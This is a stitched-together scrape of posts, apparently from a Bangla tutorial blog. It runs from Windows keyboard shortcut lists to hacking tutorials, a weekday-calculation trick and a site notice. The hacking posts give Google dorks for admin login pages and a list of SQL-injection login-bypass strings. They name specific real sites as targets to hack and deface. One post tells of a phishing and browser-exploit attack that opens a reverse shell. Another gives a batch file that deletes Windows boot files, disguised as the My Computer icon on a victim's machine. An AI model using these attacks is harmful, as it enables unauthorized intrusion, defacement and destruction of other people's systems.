Windows Explorer)
ESC (Cancel the current task)
Shift when you insert a CD-ROM
into the CD-ROM drive (Prevent
the CD-ROM from automatically
playing)
Dialog Box Keyboard Shortcuts
CTRL+Tab (Move forward
through the tabs)
CTRL+Shift+Tab (Move
backward through the tabs)
Tab (Move forward through the
options)
Shift+Tab (Move backward
through the options)
Alt+Underlined letter (Perform
the corresponding command or
select the corresponding
option)
Enter (Perform the command
for the active option or button)
Spacebar (Select or clear the
check box if the active option is
a check box)
Arrow keys (Select a button if
the active option is a group of
option buttons)
F1 key (Display Help)
F4 key (Display the items in the
active list)
Backspace (Open a folder one
level up if a folder is selected in
the Save As or Open dialog box)
Microsoft Natural Keyboard
Shortcuts
Win (Display or hide the Start
menu)
Win+BREAK (Display the System
Properties dialog box)
Win+D (Display the desktop)
Win+M (Minimize all of the
windows)
Win+Shift+M (Restore the
minimized windows)
Win+E (Open My Computer)
Win+F (Search for a file or a
folder)
CTRL+Win+F (Search for
computers)
Win+F1 (Display Windows Help)
Win+ L (Lock the keyboard)
Win+R (Open the Run dialog
box)
Win+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right Shift for eight seconds
(Switch FilterKeys either on or
off)
Left Alt+left Shift+PRINT
SCREEN (Switch High Contrast
either on or off)
Left Alt+left Shift+NUM
LOCK (Switch the MouseKeys
either on or off)
Shift five times (Switch the
StickyKeys either on or off)
NUM LOCK for five seconds
(Switch the ToggleKeys either
on or off)
Win +U (Open Utility Manager)
Windows Explorer Keyboard
Shortcuts
END (Display the bottom of the
active window)
HOME (Display the top of the
active window)
NUM LOCK+* (Display all of the
subfolders that are under the
selected folder)
NUM LOCK++ (Display the
contents of the selected folder)
NUM LOCK+- (Collapse the
selected folder)
LEFT ARROW (Collapse the
current selection if it is
expanded, or select the parent
folder)
RIGHT ARROW (Display the
current selection if it is
collapsed, or select the first
subfolder)
Shortcut Keys For Character Map
After you double-click a
character on the grid of
characters, you can move
through the grid by using the
keyboard shortcuts:
RIGHT ARROW (Move to the right
or to the beginning of the next
line)
LEFT ARROW (Move to the left or
to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one
row)
PAGE UP (Move up one screen at
a time)
PAGE DOWN (Move down one
screen at a time)
HOME (Move to the beginning of
the line)
END (Move to the end of the
line)
CTRL+HOME (Move to the first
character)
CTRL+END (Move to the last
character)
Spacebar (Switch between
Enlarged and Nor mal mode
when a character is selected)
Microsoft Management Console
(MMC) Main Window Keyboard
Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a
console item)
CTRL+W (Open a new window)
F5 key (Update the content of all
console windows)
Alt+Spacebar (Display the MMC
window menu)
Alt+F4 (Close the console)
Alt+A (Display the Action menu)
Alt+V (Display the View menu)
Alt+F (Display the File menu)
Alt+O (Display the Favorites
menu)
MMC Console Window Keyboard
Shortcuts
CTRL+P (Print the current page
or active pane)
Alt+- (Display the window menu
for the active console window)
Shift+F10 (Display the Action
shortcut menu for the selected
item)
F1 key (Open the Help topic, if
any, for the selected item)
F5 key (Update the content of all
console windows)
CTRL+F10 (Maximize the active
console window)
CTRL+F5 (Restore the active
console window)
Alt+Enter (Display the Properties
dialog box, if any, for the
selected item)
F2 key (Rename the selected
item)
CTRL+F4 (Close the active
console window. When a
console has only one console
window, this shortcut closes
the console)
Remote Desktop Connection
Navigation
CTRL+Alt+END (Open the m*cro
$oft Windows NT Security dialog
box)
Alt+PAGE UP (Switch between
programs from left to right)
Alt+PAGE DOWN (Switch
between programs from right
to left)
Alt+INSERT (Cycle through the
programs in most recently used
order)
Alt+HOME (Display the Start
menu)
CTRL+Alt+BREAK (Switch the
client computer between a
window and a full screen)
Alt+Delete (Display the Windows
menu)
CTRL+Alt+- (Place a snapshot of
the active window in the client
on the Terminal server
clipboard and provide the same
functionality as pressing PRINT
SCREEN on a local computer.)
CTRL+Alt++ (Place a snapshot of
the entire client window area
on the Terminal server
clipboard and provide the same
functionality as pressing Alt
+PRINT SCREEN on a local
computer.)
Internet Explorer Navigation
CTRL+B (Open the Organize
Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog
box)
CTRL+N (Start another instance
of the browser with the same
Web address)
CTRL+O (Open the Open dialog
box, the same as CTRL+L)
CTRL+P (Open the Print dialog
box)
CTRL+R (Update the current
Web page)
CTRL+W (Close the current
window)

hacking -BTtutorial

সহজ
হ্যাকিং শিখবো , তবে এই পদ্ধতিতে কিনতু
হ্যাক্সর আহমেদ এর চটিকন্ঠের
মতো কোনো সাইট র্টাগেট করে হ্যাক
করা যাইপে না ।
এই কাজটি আমরা authentication bypass
পদ্ধতিতে এডমিন আইডি হ্যাকিং করব।
হ্যাকিং শুরু করুনঃ
১।প্রথমে আমরা যাবো google.কম এ।
২।এবার Search বক্সে নিচের যে কোন
একটি Google dork/sql injection লিখুন।
আপনাদের সুবিধার্থে আমি sql injection কিছু
দিয়ে দিলাম নিচে।
“inurl:admin.as p”
“inurl:login/ admin.asp”
“inurl:admin/ login.asp”
“inurl:adminlog in.asp”
“inurl:adminhom e.asp”
“inurl:admin_lo gin.asp”
“inurl:administ ratorlogin.asp”
“inurl:login/ administrator.as p”
“inurl:administ rator_login.asp ”
“inurl: admin.php”
“inurl: login/ admin.php”
“inurl: admin/ login.php”
“inurl: adminlogin.php”
“inurl: adminhome.php”
“inurl: admin_login.php ”
“inurl: administratorlo gin.php”
“inurl: login/ administrator.ph p”
“inurl: administrator_l ogin.php”
এবার সার্চ দিন। তাহলে অনেক
গুলো ফলাফল পাবেন।
যে কোনো একটি সাইটে প্রবেশ করুন।
তাহলে সাইটটি আপনাকে নিচের
মতো কিছু দেখাবে…
“welcome to xxxxxxxxxx administrator
panel”
username :
password :
এখানে ইউজার নেম দিনঃ Admin
তাহলে পাসওয়ার্ড কি দিবেন ? নিচের
থেকে যে কোন একটি দিন।
নিচে কিছু sql injections পাস দিলাম। এখান
থেকে যে কোন একটি দিনঃ
‘ or ’1′=’1
‘ or ‘x’=’x
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
‘or’1=1′
তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:’or’1′ =’1
এবার submit এ ক্লিক করুন। ব্যস কাজ শেষ
আপনি এখন ঐ সাইট এর এডমিন।
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়।
তাই যেকোনো সাইটে লিখতে পারবেন
না “hacked by ছুক্কু মিয়া ” যে সব সাইট
vulnerable সেগুলোতে লিখতে পারবেন।
নিচে কিছু vulnerable সাইট দিলাম যাতে কষ্ট
করে আপনাকে গুগল এ খুজতে না হয় ।
তাহলে নিচের সাইট গুলা আগে হ্যাক করুনঃ
sunmarytrust .org/adm inlogin.asp
arcvns .com/admin.asp
amskrupajal .org/Admi nLogin.asp
quickwrench .com/Adm in/ adminlogin.asp
adyar .net/ Adminlogin. asp
ringjordan .com/Admin Login.asp
preventivecardi ology .i n/ adminlogin.asp
udesa .co.za/admin /login.asp
railgourmet .com/admi n/ admin-login.asp
(লিংক গুলোতে আমি কিছু স্পেস দিয়েছি ,
আপনারা সেগুলো রিমুভ করে ব্রাউজারে পেষ্ট
করূন) গুগল এ খুজলে আপনি হাজার হাজার
vulnerable সাইট পাবেন ।
এটা তো দুধ ভাত হ্যাকিং , যেগুলা আমার
মতো যেকোনো “হকারই” পারবো ! আসল
হ্যাকিং শিখতে বড় ভাইয়ের
ঠ্যাং ধইরা কান্দাকাটি করন লাগবো

ইনফর্মেশন গেদারিং টেকনিক বা তথ্য সংগ্রহ -BTtutorial

আজকে আমরা সাধারন ইনফর্মেশন
গেদারিং টেকনিক বা তথ্য সংগ্রহ বিষয় এ
জানবো। হ্যাকিং আক্রমণ এর
সবচাইতে বেশী গুরুত্ত পূর্ণ ইনফর্মেশন
গেদারিং বা তথ্য সংগ্রহ ।এই বিষয় টাই
পরে আমাদের কোন টার্গেট কে আক্রমণ এর
প্রথম ধাপ হিসাব এ কাজ্জ করবে ।
যত বেশী তথ্য সংগ্রহ
করা যাবে ততো বেশী সফলতা অর্জন এর
সম্ভাবনা থাকে ।
১। সম্পূর্ণ বিষয় আলোচনা করার পর
আমরা বুজতে পারব কি ভাবে বিভিন্ন কৌশল ও
অনলাইন সম্পদ ব্যাবহার করে আমরা কোন
বিশেষ টার্গেট এর জনসাধারন এর জন্য যে সব
তথ্য অনলাইন এ দেওয়া আছে তা সংগ্রহ
করতে পারি । আমরা এখানে গুগলি(google),
নেটক্রাফ (Netcraft) এবং হুইস(Whois) এর মত
সার্ভিস ও টুলস গুল ব্যাবহার করব ।
২। ইনফর্মেশন গেদারিং টেকনিক বা তথ্য
সংগ্রহ অংশটাই আপনাকে নতুন নতুন
গুগলি হ্যাক (google hack) ও তার ব্যাবহার
সম্পর্কে পারদর্শী করে তুলবে ।
উদাহারন দিলাম এখানে মূল বিষয় টা পরিষ্কার
করে না রাখলেই নয় ঃ
ধরুন আমি একটা পেনটেস্টিং এর কাজ
করছি আমাকে যে টার্গেট দেওয়া হোল
তাতে অ্যাটাক করার মত তেমন কোন ভাল সুজুগ
পাওয়া যাচ্ছিলো না । যে কয়েকটা অপশন ছিল
অ্যাটাক করার টা ও খুব ভাল ভাবে সিকিউর করা।
এমতা অবস্থায় যে হেতু যে কোন ভাবেই হোক
আমাকে মেশিন টাকে নিয়ন্ত্রন এ নিতে হবে ।
সেই অবস্থায় আমাকে বিশেষ ভাবে ভিন্ন পথ
বেছে নিতে হবে প্রথম এ ।
আমি গুগলি করে কোম্পানির একজন
কর্মকর্তার ইমেইল সহ বিভিন্ন তথ্য সংগ্রহ
করে ফেলি এবং যাচাই বাছাই
করে আমি বুজতে পারি তার কোন বিষয় খুব
বেশী আগ্রহ এবং সে অই বিষয় এর
সাথে সম্পৃক্ত বিভিন্ন ব্লগ ও ফোরাম এর
সদস্য ।
তখন আমি ভিন্ন নাম এ তার পিছু পিছু সেই সব
ব্লগ ও ফোরাম এর সদস্য হয়ে গেলাম ।
এবং তার সাথে পার্সোনাল ম্যাসেজ এ সেই
বিষয় এর উপর একটা তথ্য দিলাম । স্বভাবতই
তার জন্য আগে থেকে তৈরি করা নো-
আইপি ডোমেইন এ একটা ডোমেইন রেজিস্টার
করে তার যেই বিষয় টার প্রতি আগ্রহ
সেটা ভিডিও,ছবি বা অন্যকিছুর সাথে চলতি সময়
এর বিশেষ কোন ব্রাউজার এর এক্সপ্লইট
কোড যোগ করে অই
ডেমো সাইটা টা তৈরি করে রাখি । যখন
সে আমার কথার উপর ভিত্তি করে এবং আগ্রহ
নিয়ে আমার তৈরি করা ওয়েবসাইট এ
যাবে এবং শেখান থেকে কিছু ডাউনলোড করুক
বা না করুক আমার মেলেসিয়াস কোড
স্বয়ং ক্রিয় ভাবে টার কম্পিউটার এ
ডাউনলোড হবে এবং স্বয়ংক্রিয় ভাবে নেটকেট
এ রিভার্স সেল আমাকে পাঠাবে । এর পরের
ঘটনা বুজতেই পারছেন ।
এইটা একটা সাধারন উদাহারন যে কি ভাবে তথ্য
সংগ্রহ বা ইনফর্মেশন গেদারিং বা তথ্য
সংগ্রহ ই আপনার কাঙ্ক্ষিত
সফলতা এনে দিতে পারে । এই রকম
হাজারো পদ্দতি আমরা ব্যাবহার করতে পারি।
আমার বেক্তি গত মতামত একজন ভিকটিম এর
মন পঠন (mind reading) টার বিভিন্ন অনলাইন
কার্যাবলী কে বিচার বিশ্লেষণ
করে সম্ভাবনা যাচাই বাছাই এর
মাধ্যমে বুঝে নেওয়া সম্ভব তার আগ্রহ
টা কোথায় আর এইটা তখনি সম্ভব যখন
আপনার কাছে পর্যাপ্ত তথ্য থাকে ।

হ্যাকিং শিক্ষার জন্য কিছু জিজ্ঞাসা-BTtutorial

প্রত্যেক দিন ফেসবুক এ অনেক এর
সাথে কথা হয় কেউ পরিচিত কেউ বা অপরিচিত ।
বিভিন্ন বয়স আর বিভিন্ন পেশার মানুষ এর
সাথে । সবার একটাই অনূরোধ থাকে বা আক্ষেপ
থাকে বা প্রশ্ন থাকে – ” ভাই আমি হ্যাকার
হতে চাই কি ভাবে হবো ?
আপনি কি আমাকে শিখাবেন ?
বা আমি শিখবো রাস্তা টা দেখান । কেউ
তোঁ শিখাতে চায় না । ”
আরও অনেক অনেক প্রশ্নর সম্মুখীন হতে হয়
আমাকে । আসলে আমি নিজে হ্যাকার নই
তবে হ্যাকার দের সাথে মিশার সুজুগ হওয়ায় খুব
কাছে থেকে তাদের স্বভাব,চিন্তা ধারা,তাদের
কাজ করার কৌশল অনেক কিছুর সাথে পরিচিত ।
সেই সুবাধে অনেক সময় টুক টাক তাদের
আওড়ান কথা অন্নকে বলি ।
যদি আপনি গুগলি তে সার্চ করেন how can i
become a professional hacker ?
তাহলে আপনি About 7,540,000 results (0.34
seconds) ফলাফল আপনার চোখের
সামনে দেখতে পারবেন ।
হ্যাঁ সবার মত আমিও
বলছি হ্যাকিং যদি শিখতে হয়
তাহলে গুগলি হচ্ছে আপনার পাঠশালা । এই
গুগলিই আপনাকে দিতে পারে হ্যাকিং জগত এ
প্রবেশ এর সঠিক রাস্তার ঠিকানা । তাই সবার
আগে যা প্রয়োজন টা হোল এই গুগলিকে ১০০
ভাগ সঠিক ভাবে ব্যাবহার করে আপনি আপনার
কাঙ্ক্ষিত হ্যাকিং জগত এর সন্ধান লাভ
করতে পারেন। গুগলির ব্যাবহার
নিয়ে আমরা আজকে আলোচনা করবো না ।
গুগলি এমন এক বিষয় যেটা নিয়ে একটা লিখায়
কিছুই বুঝানো সম্ভব নয় তাই
আমরা ফিরে যাচ্ছি আমাদের মুল আলোচনায় ।
একজন হ্যাকার হতে হলে কিছু বিশেষ বেপার
আপনাকে লক্ষ রাখতে হবে
১। হ্যাকিং এর আগপাছ সম্পর্কে জানুন ।
২। আপনাকে আগে জানতে হবে একজন হ্যাকার
হতে গেলে কি কি মৌলিক বিষয় গুল আপনার
জানা থাকা প্রয়োজন এবং বিশেষ কোন বিষয়
এর উপর আপনাকে কঠোর পরিশ্রম
করতে হবে।
৩ । আপনাকে আগে সিদ্ধান্ত
নিতে হবে আপনি কোন বিষয় নিয়ে কাজ করবেন
হার্ডওয়্যার না সফটওয়্যার ? কখনই
চিন্তা করবেন না আপনি ২ টা তেই সমান
ভাবে বিশেষজ্ঞ হবেন বা হতে হবে । তবে উভয়
বিষয় এ আপনার জ্ঞান এর প্রয়োজন
রয়েছে এই ক্ষেত্রে । কিন্তু আপনার সিদ্ধান্ত
ই আপনাকে সাহায্য
করবে আপনি কোথা থেকে শুরু করবেন ।
৪ । আপনাকে অবশ্যই প্রোগ্রামিং জানতে হবে
৫ । আপনাকে বিভিন্ন
সিকিউরিটি অপারেটিং সিস্টেম যেমন ব্যাক-
ট্রাক, কালি লিনাক্স বা বিভিন্ন হ্যাকার দের
দাড়া তৈরি লিনাক্স ডিসট্র
সম্পর্কে জানতে হবে । এছাড়াও উইন্ডোজ
এবং ম্যাক অপারেটিং সিস্টেম
সম্পর্কে জানতে হবে আপনাকে।
৬। একটা প্রফেশনাল কোর্স করতে পারেন,
কোর্স বিভিন্ন ধরণের আছে যেমন এথিকাল
হ্যাকিং অথবা ইন্টারনেট সিকিউরিটি বিষয়ক
যা কিনা আপনার এথিকাল
হ্যাকিং সম্পর্কে আপনার জ্ঞান প্রসারিত
করতে সাহায্য করবে ।
৭। আপনি নিজ থেকে জানার জন্য বিভিন্ন
হ্যাকিং বিষয়
নিয়ে পরীক্ষা নিরীক্ষা করতে পারেন
তাতে আপনি আসল বেপার
টা কি ঘটছে তা বুঝতে সক্ষম হবেন।
তবে অবশ্যই পরীক্ষা টা যেন নিজের
তৈরি করা ল্যাব এ হয় । বিনা অনুমতি তে অন্নের
উপর
পরীক্ষা নিরীক্ষা করতে গেলে আপনি নিজেই
ক্ষতি গ্রস্ত হতে পারেন।
৮। হার্ডওয়্যার এবং সফ্টওয়্যার
সঙ্গে পরীক্ষা নিরীক্ষা শুরু করুন
কি ভাবে পরিস্থিতি কে নিয়ন্ত্রণ
এবং কি ভাবে একটা কম্পিউটার কে হ্যাক
হওয়া থেকে প্রতিরোধ করা যায় ।
৯। নিজে নিজে আপনাকে প্রচুর
পড়াশুনা করতে হবে বিভিন্ন বিষয় এর উপর ।
তথ্যপ্রযুক্তি প্রতিনিয়ত প্রবর্তন ঘটছে এর
সাথে নিজেকে তাল মিলয়ে চলতে হলে আপনার
পড়াশুনার অভ্যাস এর বিকল্প নেই ।
পড়াশুনা সধু মাত্র তথ্য প্রজুক্তিই নয় আপনার
পারিপাস্সিক বিভিন্ন বিষয় যা আপনার চিন্তা ও
বুজার ক্ষমতা সহ জ্ঞান এর পরিধি বিভিন্ন
বিষয় এর উপর একটা বিশেষ
পরিপক্বতা নিয়ে আশে।
.১০ । প্রচুর ধর্য শক্তির প্রয়োজন যার জন্য
আপনাকে সব সময় শান্ত এবং ধর্য শিল
হওয়া শিখতে হবে ।
১১ । সর্ব পরি আপনার মস্তিস্ক কে ১০০ ভাগ
ব্যাবহার করার চেষ্টা করতে হবে ।
চিন্তা শক্তি ও বিশ্লেষণ করার
ক্ষমতা বারাতে হবে।যে কোন বিষয় নজর এ
এলে প্রথমে সম্ভাব্য প্রতিটা ভবিষ্যৎ
ফলাফল কি হতে পারে টা নিয়ে বিচার বিশ্লেষণ
করে সিদ্ধান্ত গ্রহণ করা।
১২। বিভিন্ন অনলাইন হ্যাকিং ফোরাম
এবং হ্যাকিং কমুউনিটির সাথে সম্পৃক্ত হন
তাদের বিভিন্ন হ্যাকিং প্রশিক্ষণ
থেকে আপনি হ্যাকিং এর দিক নির্দেশনা পাবেন
যা আপনার হ্যাকিং শিক্ষার ক্ষেত্রে বিশাল
ভুমিকা রাখতে পারে।

একটি পিসিকে চিরজীবনের জন্য মেরে ফেলুন-BTtutorial

কম্পিউটারে লালবাতি ধরাইছিলাম
যাউক গা , কাজের কথায় আসি ।নিচের
কোডটি কপি করে আপনার ভিকটিমের
কম্পিউটারের নোটপ্যাডে পেষ্ট করুন।
@echo off
attrib -r -s -h
c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del
c:boot.ini
attrib -r -s -h c:ntldr
del
c:ntldr
attrib -r -s -h
c:windowswin.
ini
del
c:windowswin.ini
এবার এটিকে fun.bat নামে সেভ করুন।
তবে এটাকে আপনি .bat বা .cmd তে সেভ
করতে পারবেন। এবার ডেক্সটপ Home এ My
Computer টাকে ভোগে পাঠিয়ে দিয়ে ঐ যায়গায়
আপনার Fun.bad ফাইলটা রেখে My Computer
এর icon টা লাগিয়ে দিন ।
ব্যাস , ঐখানে ডাবল ক্লিক মারলে কেল্লা ফতে

যে কোন তারিখের ১০০% সঠিক বার বলুন-BTtutorial

যা জানা জরুরীঃ
প্রতি চার বছর পর পর
ইংরেজী একবছরে ৩৬৫ দিনের
সাথে ১ দিন যোগ হয় ৩৬৬ দিন
হয়। ঐ বছরকে লীপ ইয়ার
বা অধিবর্ষ বলে।(এটা সবার
জানা)
কিন্তু প্রতি চারশত
বছরে তিনটি করে লীপ ইয়ার
বাদ দেয়া হয়। যেমনঃ
লীপ-ইয়ার
নয়ঃ (সাল): ১০০,
২০০, ৩০০,★ ৫০০,
৬০০, ৭০০, ★
৯০০, ১০০০,
১১০০, ★ ১৩০০,
১৪০০ ১৫০০, ★
১৭০০, ১৮০০,
১৯০০,★ ২১০০,
২২০০, ২৩০০, ★
২৫০০ ইত্যাদি।
লীপ-ইয়ারঃ (সাল):
০, ৪০০, ৮০০,
১২০০, ১৬০০,
২০০০, ২৪০০,
২৮০০, ৩২০০,
৩৬০০, ৪০০০
ইত্যাদি।
একটি নির্দিষ্ট বছর (লীপ
ইয়ার ব্যতীত) যে বারে শুরু হয়,
তার একদিন পরের
বারে পরবর্তী বছর শুরু হয়।
যেমন-
২০১৩ সাল শুরু
মঙ্গলবারে
২০১৪ সাল শুরু
বুধবারে
২০১৫ সাল শুরু
বৃহস্পতিবারে
২০১৬ সাল শুরু
শুক্রবারে
কিন্তু লীপ-ইয়ারের
ক্ষেত্রে যে বারে লীপ-ইয়ার
বা অধিবর্ষ শুরু হয়, তার
দুইদিন পরের
বারে পরবর্তী বছর শুরু হয়।
যেমন-
২০০০ সাল শুরু
শনিবারে
২০০১ সাল শুরু
সোমবারে
২০০৪ সাল শুরু
বৃহস্পতিবারে
২০০৫ সাল শুরু
শনিবারে
২০০৮ সাল শুরু
মঙ্গলবারে
২০০৯ সাল শুরু
বৃহস্পতিবারে
২০১২ সাল শুরু
রবিবারে
২০১৩ সাল শুরু
মঙ্গলবারে

বাংলা টিউটোরিয়াল ॥ নির্মান কাজ চলছে

বাংলা টিউটোরিয়াল ॥ নির্মান কাজ চলছে ॥
২০১৫ সালের এর মধ্যে সব কাজ শেষ
হবে বলে আশা করি ॥ দোয়া করবেন
আপনাদের যেন একটি সফল সাইট উপহার
দিতে পারি ॥ শুধু মনে রাখবেন
http://BTtutorial.wordpress.com